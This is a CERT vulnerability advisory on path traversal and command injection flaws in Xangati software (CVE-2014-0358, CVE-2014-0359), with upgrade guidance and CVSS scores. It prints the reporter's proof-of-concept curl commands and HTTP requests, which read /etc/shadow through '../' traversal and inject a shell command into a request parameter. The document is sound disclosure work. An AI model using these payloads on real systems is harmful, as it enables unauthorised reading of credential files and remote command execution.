Xangati software release contains relative path traversal and command injection vulnerabilities

2014-04-14T00:00:00
ID VU:657622
Type cert
Reporter CERT
Modified 2014-04-14T20:30:00

Description

Overview

Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities.

Description

Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities.

CWE-23: Relative Path Traversal - CVE-2014-0358
The reporter has provided the following as a proof-of-concept. Authentication is not required to exploit these vulnerabilities.

curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=foo&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/MGConfigData'

POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=download&download=%2Ffloodguard%2Fdata%2F../../../../../../etc/shadow&updLaterThan=0&head=0&start=0&limit=4950&remote=127.10.10.5

POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=port_svc&download=%2Ffloodguard%2Fdata%2F../../../../../../../etc/shadow&updLaterThan=0&remote=127.10.10.5

curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/Installer'

curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&binfile=%2Fourlogs%2F../../../../../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/MGConfigData'

CWE-78: Improper Neutralization of Special Elements used in an OS Command - CVE-2014-0359
The reporter has provided the following as a proof-of-concept. Authentication is required to exploit this vulnerability.

curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F&params=gui_input_test.pl&params=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \
'hxxps://127.10.10.5/servlet/Installer'

The CVSS score below is for CVE-2014-0359.


Impact

A remote unauthenticated attacker may be able to read system files. A remote authenticated attacker may be able to run arbitrary system commands.


Solution

Apply an Update

Upgrade to XSR11 or XNR 7 for the appropriate product..


Vendor Information

657622

Filter by status: All Affected Not Affected Unknown

Filter by content: __ Additional information available

__ Sort by: Status Alphabetical

Expand all

Javascript is disabled. Click here to view vendors.

Xangati Inc Affected

Notified: January 23, 2014 Updated: April 11, 2014

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

CVSS Metrics

Group | Score | Vector
---|---|---
Base | 9.4 | AV:N/AC:L/Au:N/C:C/I:C/A:N
Temporal | 8.2 | E:ND/RL:OF/RC:C
Environmental | 2.1 | CDP:ND/TD:L/CR:ND/IR:ND/AR:ND

References

  • <https://cwe.mitre.org/data/definitions/78.html>
  • <https://cwe.mitre.org/data/definitions/23.html>
  • <http://xangati.com/products/>

Acknowledgements

Thanks to Jan Kadijk for reporting this vulnerability.

This document was written by Jared Allar.

Other Information

CVE IDs: | CVE-2014-0358, CVE-2014-0359
---|---
Date Public: | 2014-04-14
Date First Published: | 2014-04-14
Date Last Updated: | 2014-04-14 20:30 UTC
Document Revision: | 12